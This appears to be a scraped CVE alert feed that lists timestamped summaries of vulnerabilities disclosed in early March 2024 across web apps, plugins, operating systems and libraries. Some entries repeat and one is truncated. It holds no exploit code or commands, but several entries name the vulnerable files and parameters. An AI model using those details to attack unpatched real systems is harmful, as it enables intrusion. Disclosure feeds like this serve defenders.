🚨 CVE-2022-47083A PHP Object Injection vulnerability in the unserialize() function Spitfire CMS v1.0.475 allows authenticated attackers to execute arbitrary code via sending crafted requests to the web application.🎖@cveNotify |
|
| 2024-03-08 12:37:36 |
🚨 CVE-2024-2317A vulnerability was found in Bdtask Hospital AutoManager up to 20240227 and classified as problematic. This issue affects some unknown processing of the file /prescription/prescription/delete/ of the component Prescription Page. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256271. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-08 12:37:35 |
🚨 CVE-2024-2316A vulnerability has been found in Bdtask Hospital AutoManager up to 20240227 and classified as problematic. This vulnerability affects unknown code of the file /billing/bill/edit/ of the component Update Bill Page. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256270 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-08 07:37:25 |
🚨 CVE-2024-1851The affiliate-toolkit – WordPress Affiliate Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the atkp_create_list() function in all versions up to, and including, 3.5.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to to perform unauthorized actions such as creating product lists.🎖@cveNotify |
|
| 2024-03-08 06:37:31 |
🚨 CVE-2024-27613Numbas editor before 7.3 mishandles reading of themes and extensions.🎖@cveNotify |
|
| 2024-03-08 06:37:30 |
🚨 CVE-2024-1987The WP-Members Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.4.9.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-08 06:37:26 |
🚨 CVE-2024-2283A vulnerability classified as critical has been found in boyiddha Automated-Mess-Management-System 1.0. Affected is an unknown function of the file /member/view.php. The manipulation of the argument date leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256050 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-08 06:37:25 |
🚨 CVE-2024-2282A vulnerability was found in boyiddha Automated-Mess-Management-System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php of the component Login Page. The manipulation of the argument useremail leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256049 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-08 06:37:24 |
🚨 CVE-2024-2281A vulnerability was found in boyiddha Automated-Mess-Management-System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/index.php of the component Setting Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256048. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-08 05:37:25 |
🚨 CVE-2024-23746Miro Desktop 0.8.18 on macOS allows code injection via a complex series of steps that might be usable in some environments (bypass a kTCCServiceSystemPolicyAppBundles requirement via a file copy, an app.app/Contents rename, an asar modification, and a rename back to app.app/Contents).🎖@cveNotify |
|
| 2024-03-08 04:37:44 |
🚨 CVE-2024-0914A timing side-channel vulnerability has been discovered in the opencryptoki package while processing RSA PKCS#1 v1.5 padded ciphertexts. This flaw could potentially enable unauthorized RSA ciphertext decryption or signing, even without access to the corresponding private key.🎖@cveNotify |
|
| 2024-03-08 03:37:32 |
🚨 CVE-2024-23201A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Monterey 12.7.4, watchOS 10.3, tvOS 17.3, macOS Ventura 13.6.5, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3. An app may be able to cause a denial-of-service.🎖@cveNotify |
|
| 2024-03-08 03:37:31 |
🚨 CVE-2023-52161The Access Point functionality in eapol_auth_key_handle in eapol.c in iNet wireless daemon (IWD) before 2.14 allows attackers to gain unauthorized access to a protected Wi-Fi network. An attacker can complete the EAPOL handshake by skipping Msg2/4 and instead sending Msg4/4 with an all-zero key.🎖@cveNotify |
|
| 2024-03-08 02:37:49 |
🚨 CVE-2024-23201A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Monterey 12.7.4, watchOS 10.3, tvOS 17.3, macOS Ventura 13.6.5, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3. An app may be able to cause a denial-of-service.🎖@cveNotify |
|
| 2024-03-08 02:37:43 |
🚨 CVE-2024-0258The issue was addressed with improved memory handling. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges.🎖@cveNotify |
|
| 2024-03-08 02:37:42 |
🚨 CVE-2023-52161The Access Point functionality in eapol_auth_key_handle in eapol.c in iNet wireless daemon (IWD) before 2.14 allows attackers to gain unauthorized access to a protected Wi-Fi network. An attacker can complete the EAPOL handshake by skipping Msg2/4 and instead sending Msg4/4 with an all-zero key.🎖@cveNotify |
|
| 2024-03-08 02:37:41 |
🚨 CVE-2024-23222A type confusion issue was addressed with improved checks. This issue is fixed in iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, tvOS 17.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.🎖@cveNotify |
|
| 2024-03-08 02:07:25 |
🚨 CVE-2024-27198In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible🎖@cveNotify |
|
| 2024-03-08 01:37:32 |
🚨 CVE-2024-2275A vulnerability, which was classified as problematic, was found in Bdtask G-Prescription Gynaecology & OBS Consultation Software 1.0. Affected is an unknown function of the component OBS Patient/Gynee Prescription. The manipulation of the argument Patient Title/Full Name/Address/Cheif Complain/LMP/Menstrual Edd/OBS P/OBS Alc/Medicine Name/Medicine Type/Ml/Dose/Days/Comments/Template Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256044. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-08 01:37:25 |
🚨 CVE-2024-25081Splinefont in FontForge through 20230101 allows command injection via crafted filenames.🎖@cveNotify |
|
| 2024-03-08 01:37:24 |
🚨 CVE-2020-5395FontForge 20190801 has a use-after-free in SFD_GetFontMetaData in sfd.c.🎖@cveNotify |
|
| 2024-03-08 00:37:36 |
🚨 CVE-2024-2271A vulnerability classified as critical has been found in keerti1924 Online-Book-Store-Website 1.0. This affects an unknown part of the file /shop.php of the component HTTP POST Request Handler. The manipulation of the argument product_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256041 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-08 00:37:35 |
🚨 CVE-2024-25327Cross Site Scripting (XSS) vulnerability in Justice Systems FullCourt Enterprise v.8.2 allows a remote attacker to execute arbitrary code via the formatCaseNumber parameter of the Citation search function.🎖@cveNotify |
|
| 2024-03-07 23:37:25 |
🚨 CVE-2024-2268A vulnerability was found in keerti1924 Online-Book-Store-Website 1.0. It has been classified as critical. Affected is an unknown function of the file /product_update.php?update=1. The manipulation of the argument update_image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-256038 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-07 23:37:24 |
🚨 CVE-2024-1938Type Confusion in V8 in Google Chrome prior to 122.0.6261.94 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-03-07 22:37:25 |
🚨 CVE-2024-2267A vulnerability was found in keerti1924 Online-Book-Store-Website 1.0 and classified as problematic. This issue affects some unknown processing of the file /shop.php. The manipulation of the argument product_price leads to business logic errors. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256037 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-07 22:37:24 |
🚨 CVE-2024-2265A vulnerability, which was classified as problematic, was found in keerti1924 PHP-MYSQL-User-Login-System 1.0. This affects an unknown part of the file login.sql. The manipulation leads to inclusion of sensitive information in source code. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256035. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-07 20:37:35 |
🚨 CVE-2024-2128The EmbedPress – Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's embed widget in all versions up to, and including, 3.9.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-07 20:37:31 |
🚨 CVE-2024-1725A flaw was found in the kubevirt-csi component of OpenShift Virtualization's Hosted Control Plane (HCP). This issue could allow an authenticated attacker to gain access to the root HCP worker node's volume by creating a custom Persistent Volume that matches the name of a worker node.🎖@cveNotify |
|
| 2024-03-07 20:37:30 |
🚨 CVE-2024-0759Should an instance of AnythingLLM be hosted on an internal network and the attacked be explicitly granted a permission level of manager or admin, they could link-scrape internally resolving IPs of other services that are on the same network as AnythingLLM.This would require the attacker also be able to guess these internal IPs as `/*` ranging is not possible, but could be brute forced.There is a duty of care that other services on the same network would not be fully open and accessible via a simple CuRL with zero authentication as it is not possible to set headers or access via the link collector.🎖@cveNotify |
|
| 2024-03-07 20:37:29 |
🚨 CVE-2021-38243xunruicms up to v4.5.1 was discovered to contain a remote code execution (RCE) vulnerability in /index.php. This vulnerability allows attackers to execute arbitrary code via a crafted GET request.🎖@cveNotify |
|
| 2024-03-07 20:37:26 |
🚨 CVE-2023-40796Phicomm k2 v22.6.529.216 was discovered to contain a command injection vulnerability via the function luci.sys.call.🎖@cveNotify |
|
| 2024-03-07 20:37:25 |
🚨 CVE-2023-31655redis v7.0.10 was discovered to contain a segmentation violation. This vulnerability allows attackers to cause a Denial of Service (DoS) via unspecified vectors.🎖@cveNotify |
|
| 2024-03-07 20:37:24 |
🚨 CVE-2023-31729TOTOLINK A3300R v17.0.0cu.557 is vulnerable to Command Injection via /cgi-bin/cstecgi.cgi.🎖@cveNotify |
|
| 2024-03-07 19:37:39 |
🚨 CVE-2024-21348Internet Connection Sharing (ICS) Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-03-07 19:37:33 |
🚨 CVE-2024-21347Microsoft ODBC Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-03-07 19:37:32 |
🚨 CVE-2024-23203The issue was addressed with additional permissions checks. This issue is fixed in macOS Sonoma 14.3, iOS 17.3 and iPadOS 17.3. A shortcut may be able to use sensitive data with certain actions without prompting the user.🎖@cveNotify |
|
| 2024-03-07 19:37:31 |
🚨 CVE-2022-42816A logic issue was addressed with improved state management. This issue is fixed in macOS Ventura 13. An app may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2024-03-07 19:37:27 |
🚨 CVE-2023-51384In ssh-agent in OpenSSH before 9.6, certain destination constraints can be incompletely applied. When destination constraints are specified during addition of PKCS#11-hosted private keys, these constraints are only applied to the first key, even if a PKCS#11 token returns multiple keys.🎖@cveNotify |
|
| 2024-03-07 19:37:26 |
🚨 CVE-2023-31517A memory leak in the component CConsole::Chain of Teeworlds v0.7.5 allows attackers to cause a Denial of Service (DoS) via opening a crafted file.🎖@cveNotify |
|
| 2024-03-07 18:07:47 |
🚨 CVE-2024-23296A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 17.4 and iPadOS 17.4. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple is aware of a report that this issue may have been exploited.🎖@cveNotify |
|
| 2024-03-07 18:07:46 |
🚨 CVE-2023-7242Industrial Control Systems Network Protocol Parsers (ICSNPP) - Ethercat Zeek Plugin versions d78dda6 and prior are vulnerable to out-of-bounds read during the process of analyzing a specific Ethercat packet. This could allow an attacker to crash the Zeek process and leak some information in memory.🎖@cveNotify |
|
| 2024-03-07 18:07:41 |
🚨 CVE-2023-28525IBM Engineering Requirements Management 9.7.2.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 251052.🎖@cveNotify |
|
| 2024-03-07 18:07:40 |
🚨 CVE-2024-21351Windows SmartScreen Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-03-07 18:07:37 |
🚨 CVE-2024-23897Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.🎖@cveNotify |
|
| 2024-03-07 18:07:36 |
🚨 CVE-2023-38161Windows GDI Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-03-07 18:07:35 |
🚨 CVE-2017-18595An issue was discovered in the Linux kernel before 4.14.11. A double free may be caused by the function allocate_trace_buffer in the file kernel/trace/trace.c.🎖@cveNotify |
|
| 2024-03-07 17:37:37 |
🚨 CVE-2023-45229EDK2's Network Package is susceptible to an out-of-bounds read vulnerability when processing the IA_NA or IA_TA option in a DHCPv6 Advertise message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality.🎖@cveNotify |
|
| 2024-03-07 17:37:30 |
🚨 CVE-2023-1192A use-after-free flaw was found in smb2_is_status_io_timeout() in CIFS in the Linux Kernel. After CIFS transfers response data to a system call, there are still local variable points to the memory region, and if the system call frees it faster than CIFS uses it, CIFS will access a free memory region, leading to a denial of service.🎖@cveNotify |
|
| 2024-03-07 17:37:29 |
🚨 CVE-2023-5043Ingress nginx annotation injection causes arbitrary command execution.🎖@cveNotify |
|
| 2024-03-07 16:37:25 |
🚨 CVE-2023-48725A stack-based buffer overflow vulnerability exists in the JSON Parsing getblockschedule() functionality of Netgear RAX30 1.0.11.96 and 1.0.7.78. A specially crafted HTTP request can lead to code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2024-03-07 15:37:47 |
🚨 CVE-2024-0818Arbitrary File Overwrite Via Path Traversal in paddlepaddle/paddle before 2.6🎖@cveNotify |
|
| 2024-03-07 15:37:46 |
🚨 CVE-2024-0917remote code execution in paddlepaddle/paddle 2.6.0🎖@cveNotify |
|
| 2024-03-07 14:07:50 |
🚨 CVE-2023-51786An issue was discovered in Lustre versions 2.13.x, 2.14.x, and 2.15.x before 2.15.4, allows attackers to escalate privileges and obtain sensitive information via Incorrect Access Control.🎖@cveNotify |
|
| 2024-03-07 14:07:49 |
🚨 CVE-2023-49989Hotel Booking Management v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at update.php.🎖@cveNotify |
|
| 2024-03-07 14:07:45 |
🚨 CVE-2023-49987A cross-site scripting (XSS) vulnerability in the component /management/term of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tname parameter.🎖@cveNotify |
|
| 2024-03-07 14:07:44 |
🚨 CVE-2024-2236A timing-based side-channel flaw was found in libgcrypt's RSA implementation. This issue may allow a remote attacker to initiate a Bleichenbacher-style attack, which can lead to the decryption of RSA ciphertexts.🎖@cveNotify |
|
| 2024-03-07 14:07:39 |
🚨 CVE-2024-28110Go SDK for CloudEvents is the official CloudEvents SDK to integrate applications with CloudEvents. Prior to version 2.15.2, using cloudevents.WithRoundTripper to create a cloudevents.Client with an authenticated http.RoundTripper causes the go-sdk to leak credentials to arbitrary endpoints. When the transport is populated with an authenticated transport, then http.DefaultClient is modified with the authenticated transport and will start to send Authorization tokens to any endpoint it is used to contact. Version 2.15.2 patches this issue.🎖@cveNotify |
|
| 2024-03-07 14:07:38 |
🚨 CVE-2024-20337A vulnerability in the SAML authentication process of Cisco Secure Client could allow an unauthenticated, remote attacker to conduct a carriage return line feed (CRLF) injection attack against a user. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link while establishing a VPN session. A successful exploit could allow the attacker to execute arbitrary script code in the browser or access sensitive, browser-based information, including a valid SAML token. The attacker could then use the token to establish a remote access VPN session with the privileges of the affected user. Individual hosts and services behind the VPN headend would still need additional credentials for successful access.🎖@cveNotify |
|
| 2024-03-07 14:07:34 |
🚨 CVE-2024-20335A vulnerability in the web-based management interface of Cisco Small Business 100, 300, and 500 Series Wireless APs could allow an authenticated, remote attacker to perform command injection attacks against an affected device. In order to exploit this vulnerability, the attacker must have valid administrative credentials for the device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system.🎖@cveNotify |
|
| 2024-03-07 14:07:33 |
🚨 CVE-2024-20292A vulnerability in the logging component of Cisco Duo Authentication for Windows Logon and RDP could allow an authenticated, local attacker to view sensitive information in clear text on an affected system. This vulnerability is due to improper storage of an unencrypted registry key in certain logs. An attacker could exploit this vulnerability by accessing the logs on an affected system. A successful exploit could allow the attacker to view sensitive information in clear text.🎖@cveNotify |
|
| 2024-03-07 14:07:32 |
🚨 CVE-2024-1714An issue exists in all supported versions of IdentityIQ Lifecycle Manager that can result if an entitlement with a value containing leading or trailing whitespace is requested by an authenticated user in an access request.🎖@cveNotify |
|
| 2024-03-07 12:37:28 |
🚨 CVE-2024-28229In JetBrains YouTrack before 2024.1.25893 user without appropriate permissions could restore issues and articles🎖@cveNotify |
|
| 2024-03-07 12:37:27 |
🚨 CVE-2023-2889Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Veon Computer Service Tracking Software allows SQL Injection.This issue affects Service Tracking Software: before crm 2.0.🎖@cveNotify |
|
| 2024-03-07 11:37:25 |
🚨 CVE-2024-1170The Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to unauthorized media file deletion due to a missing capability check on the handle_deleted_media function in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to delete arbitrary media files.🎖@cveNotify |
|
| 2024-03-07 11:37:24 |
🚨 CVE-2024-1169The Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to unauthorized media upload due to a missing capability check on the buddyforms_upload_handle_dropped_media function in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to upload media files.🎖@cveNotify |
|
| 2024-03-07 07:37:30 |
🚨 CVE-2024-28222In Veritas NetBackup before 8.1.2 and NetBackup Appliance before 3.1.2, the BPCD process inadequately validates the file path, allowing an unauthenticated attacker to upload and execute a custom file.🎖@cveNotify |
|
| 2024-03-07 07:37:29 |
🚨 CVE-2024-1419The The Plus Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘_id’ attribute of the Header Meta Content widget in all versions up to, and including, 5.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-07 06:37:36 |
🚨 CVE-2024-1720The User Registration – Custom Registration Form, Login Form, and User Profile WordPress Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Display Name' parameter in all versions up to, and including, 3.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability requires social engineering to successfully exploit, and the impact would be very limited due to the attacker requiring a user to login as the user with the injected payload for execution.🎖@cveNotify |
|
| 2024-03-07 06:37:35 |
🚨 CVE-2024-1500The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Logo Widget in all versions up to, and including, 1.3.91 due to insufficient input sanitization and output escaping on user supplied URLs. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-07 06:37:31 |
🚨 CVE-2024-1366The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘archive_title_tag’ attribute of the Archive Title widget in all versions up to, and including, 3.10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-07 06:37:30 |
🚨 CVE-2024-28215nGrinder before 3.5.9 allows an attacker to create or update webhook configuration due to lack of access control, which could be the cause of information disclosure and limited Server-Side Request Forgery.🎖@cveNotify |
|
| 2024-03-07 06:37:29 |
🚨 CVE-2024-28214nGrinder before 3.5.9 allows to set delay without limitation, which could be the cause of Denial of Service by remote attacker.🎖@cveNotify |
|
| 2024-03-07 06:37:26 |
🚨 CVE-2024-28213nGrinder before 3.5.9 allows to accept serialized Java objects from unauthenticated users, which could allow remote attacker to execute arbitrary code via unsafe Java objects deserialization.🎖@cveNotify |
|
| 2024-03-07 06:37:25 |
🚨 CVE-2024-0815Command injection in paddle.utils.download._wget_download (bypass filter) in paddlepaddle/paddle 2.6.0🎖@cveNotify |
|
| 2024-03-07 06:37:24 |
🚨 CVE-2024-0817Command injection in IrGraph.draw in paddlepaddle/paddle 2.6.0🎖@cveNotify |
|
| 2024-03-07 05:37:32 |
🚨 CVE-2024-28214nGrinder before 3.5.9 allows to set delay without limitation, which could be the cause of Denial of Service by remote attacker.🎖@cveNotify |
|
| 2024-03-07 05:37:25 |
🚨 CVE-2024-28211nGrinder before 3.5.9 allows connection to malicious JMX/RMI server by default, which could be the cause of executing arbitrary code via RMI registry by remote attacker.🎖@cveNotify |
|
| 2024-03-07 05:37:24 |
🚨 CVE-2023-51395The vulnerability described by CVE-2023-0972 has been additionally discovered in Silicon Labs Z-Wave end devices. This vulnerability may allow an unauthenticated attacker within Z-Wave range to overflow a stack buffer, leading to arbitrary code execution.🎖@cveNotify |
|
| 2024-03-07 04:37:39 |
🚨 CVE-2024-28097Calendar functionality in Schoolbox application before version 23.1.3 is vulnerable to stored cross-site scripting allowing authenticated attacker to perform security actions in the context of the affected users.🎖@cveNotify |
|
| 2024-03-07 04:37:35 |
🚨 CVE-2024-28095News functionality in Schoolbox application before version 23.1.3 is vulnerable to stored cross-site scripting allowing authenticated attacker to perform security actions in the context of the affected users.🎖@cveNotify |
|
| 2024-03-07 04:37:34 |
🚨 CVE-2024-0815confirmed🎖@cveNotify |
|
| 2024-03-07 04:37:33 |
🚨 CVE-2023-3335Insertion of Sensitive Information into Log File vulnerability in Hitachi Ops Center Administrator on Linux allows local users to gain sensitive information.This issue affects Hitachi Ops Center Administrator: before 10.9.3-00.🎖@cveNotify |
|
| 2024-03-07 03:37:42 |
🚨 CVE-2024-24568Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to 7.0.3, the rules inspecting HTTP2 headers can get bypassed by crafted traffic. The vulnerability has been patched in 7.0.3.🎖@cveNotify |
|
| 2024-03-07 03:37:35 |
🚨 CVE-2024-23835Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to version 7.0.3, excessive memory use during pgsql parsing could lead to OOM-related crashes. This vulnerability is patched in 7.0.3. As workaround, users can disable the pgsql app layer parser.🎖@cveNotify |
|
| 2024-03-07 03:37:34 |
🚨 CVE-2023-39325A malicious HTTP/2 client which rapidly creates requests and immediately resets them can cause excessive server resource consumption. While the total number of requests is bounded by the http2.Server.MaxConcurrentStreams setting, resetting an in-progress request allows the attacker to create a new request while the existing one is still executing. With the fix applied, HTTP/2 servers now bound the number of simultaneously executing handler goroutines to the stream concurrency limit (MaxConcurrentStreams). New requests arriving when at the limit (which can only happen after the client has reset an existing, in-flight request) will be queued until a handler exits. If the request queue grows too large, the server will terminate the connection. This issue is also fixed in golang.org/x/net/http2 for users manually configuring HTTP/2. The default stream concurrency limit is 250 streams (requests) per HTTP/2 connection. This value may be adjusted using the golang.org/x/net/http2 package; see the Server.MaxConcurrentStreams setting and the ConfigureServer function.🎖@cveNotify |
|
| 2024-03-07 02:37:40 |
🚨 CVE-2024-24389A cross-site scripting (XSS) vulnerability in XunRuiCMS up to v4.6.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Add Column Name parameter.🎖@cveNotify |
|
| 2024-03-07 02:37:33 |
🚨 CVE-2024-24568Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to 7.0.3, the rules inspecting HTTP2 headers can get bypassed by crafted traffic. The vulnerability has been patched in 7.0.3.🎖@cveNotify |
|
| 2024-03-07 02:37:32 |
🚨 CVE-2023-39325A malicious HTTP/2 client which rapidly creates requests and immediately resets them can cause excessive server resource consumption. While the total number of requests is bounded by the http2.Server.MaxConcurrentStreams setting, resetting an in-progress request allows the attacker to create a new request while the existing one is still executing. With the fix applied, HTTP/2 servers now bound the number of simultaneously executing handler goroutines to the stream concurrency limit (MaxConcurrentStreams). New requests arriving when at the limit (which can only happen after the client has reset an existing, in-flight request) will be queued until a handler exits. If the request queue grows too large, the server will terminate the connection. This issue is also fixed in golang.org/x/net/http2 for users manually configuring HTTP/2. The default stream concurrency limit is 250 streams (requests) per HTTP/2 connection. This value may be adjusted using the golang.org/x/net/http2 package; see the Server.MaxConcurrentStreams setting and the ConfigureServer function.🎖@cveNotify |
|
| 2024-03-07 02:07:42 |
🚨 CVE-2024-23225A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 16.7.6 and iPadOS 16.7.6, iOS 17.4 and iPadOS 17.4. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple is aware of a report that this issue may have been exploited.🎖@cveNotify |
|
| 2024-03-07 01:37:32 |
🚨 CVE-2023-51281Cross Site Scripting vulnerability in Customer Support System v.1.0 allows a remote attacker to escalate privileges via a crafted script firstname, "lastname", "middlename", "contact" and address parameters.🎖@cveNotify |
|
| 2024-03-07 01:37:25 |
🚨 CVE-2023-49987A cross-site scripting (XSS) vulnerability in the component /management/term of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tname parameter.🎖@cveNotify |
|
| 2024-03-07 01:37:24 |
🚨 CVE-2023-47415Cypress Solutions CTM-200 v2.7.1.5600 and below was discovered to contain an OS command injection vulnerability via the cli_text parameter.🎖@cveNotify |
|
| 2024-03-06 23:37:25 |
🚨 CVE-2024-27285YARD is a Ruby Documentation tool. The "frames.html" file within the Yard Doc's generated documentation is vulnerable to Cross-Site Scripting (XSS) attacks due to inadequate sanitization of user input within the JavaScript segment of the "frames.erb" template file. This vulnerability is fixed in 0.9.36.🎖@cveNotify |
|
| 2024-03-06 23:37:24 |
🚨 CVE-2019-1020001yard before 0.9.20 allows path traversal.🎖@cveNotify |
|
| 2024-03-06 22:37:26 |
🚨 CVE-2024-27929ImageSharp is a managed, cross-platform, 2D graphics library. A heap-use-after-free flaw was found in ImageSharp's InitializeImage() function of PngDecoderCore.cs file. This vulnerability is triggered when an attacker passes a specially crafted PNG image file to ImageSharp for conversion, potentially leading to information disclosure. This issue has been patched in versions 3.1.3 and 2.1.7.🎖@cveNotify |
|
| 2024-03-06 22:07:32 |
🚨 CVE-2024-28153Jenkins OWASP Dependency-Check Plugin 5.4.5 and earlier does not escape vulnerability metadata from Dependency-Check reports, resulting in a stored cross-site scripting (XSS) vulnerability.🎖@cveNotify |
|
| 2024-03-06 22:07:26 |
🚨 CVE-2024-28152In Jenkins Bitbucket Branch Source Plugin 866.vdea_7dcd3008e and earlier, except 848.850.v6a_a_2a_234a_c81, when discovering pull requests from forks, the trust policy "Forks in the same account" allows changes to Jenkinsfiles from users without write access to the project when using Bitbucket Server.🎖@cveNotify |
|
| 2024-03-06 22:07:25 |
🚨 CVE-2024-28149Jenkins HTML Publisher Plugin 1.16 through 1.32 (both inclusive) does not properly sanitize input, allowing attackers with Item/Configure permission to implement cross-site scripting (XSS) attacks and to determine whether a path on the Jenkins controller file system exists.🎖@cveNotify |
|
| 2024-03-06 22:07:24 |
🚨 CVE-2024-20346A vulnerability in the web-based management interface of Cisco AppDynamics Controller could allow an authenticated, remote attacker to perform a reflected cross-site scripting (XSS) attack against a user of the interface of an affected device. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.🎖@cveNotify |
|
| 2024-03-06 20:37:26 |
